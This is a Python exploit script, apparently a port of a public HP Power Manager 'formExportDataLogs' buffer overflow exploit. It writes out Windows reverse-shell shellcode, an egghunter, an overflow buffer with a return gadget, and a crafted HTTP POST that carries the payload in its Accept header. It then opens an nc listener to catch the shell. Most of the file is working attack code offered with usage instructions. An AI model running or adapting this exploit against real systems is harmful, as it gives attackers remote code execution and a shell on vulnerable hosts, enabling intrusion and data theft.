#!/usr/bin/python
# This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari
# For the original script visit: https://github.com/Muhammd/HP-Power-Manager
# 
# Usage: python3 hp_pm_exploit_p3.py <Remote IP Address> <Remote Port> <Local Listener Port>
# <Remote IP Address>: ip address the HP Power Manager is running on
# <Remote Port>: port the application is running on
# <Local Listener Port>: local port your shellcode is connecting back to -> script starts nc listener to catch reverse shell
#
# Swap out the shellcode
# Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate (6.1.7600 N/A Build 7600)
# Author: CountablyInfinite

from urllib import parse
from time import sleep
from sys import argv,exit
from socket import socket,AF_INET,SOCK_STREAM
from os import system

try:
   HOST  = argv[1]
   PORT = int(argv[2]) # port the remote application is running on
   LPORT = int(argv[3]) # port the shellcode is connecting back to -> listener gets sta
   if (len(argv)>4):
      raise IndexError
except IndexError: 
   print("Usage: python3 %s <Remote IP Address> <Remote Port> <Local Listener Port>" % argv[0])
   print("Example: python3 %s 10.10.0.1 80 4411" % argv[0])
   exit()

#msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
egg = "b33fb33f"
buf = egg
buf += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64"
buf += "\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5"
buf += "\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae"
buf += "\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3"
buf += "\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0"
buf += "\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e"
buf += "\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24"
buf += "\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9"
buf += "\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80"
buf += "\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1"
buf += "\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2"
buf += "\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1"
buf += "\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d"
buf += "\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40"
buf += "\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68"
buf += "\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2"
buf += "\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed"
buf += "\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65"
buf += "\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf"
buf += "\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96"
buf += "\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc"
buf += "\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59"
buf += "\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80"
buf += "\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47"
buf += "\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89"
buf += "\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d"

#egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
hunter =  b""
hunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

buffer = b"\x41" * (721 -len(hunter))
buffer += b"\x90"*30 + hunter
buffer += b"\xeb\xc2\x90\x90"            #JMP SHORT 0xC2 
buffer += b"\xd5\x74\x41" 	              #pop esi # pop ebx # ret 10 (DevManBE.exe)

content= "dataFormat=comma&exportto=file&fileName=%s" % parse.quote_plus(buffer)
content+="&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"

payload =  "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % buf
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit")
print("[+] Sending exploit to Ip " +str(HOST)+" on port "+str(PORT)+". Starting local listener on port "+str(LPORT))
s.send(payload.encode('latin1'))
system("nc -nlvp "+ str(LPORT))
s.close()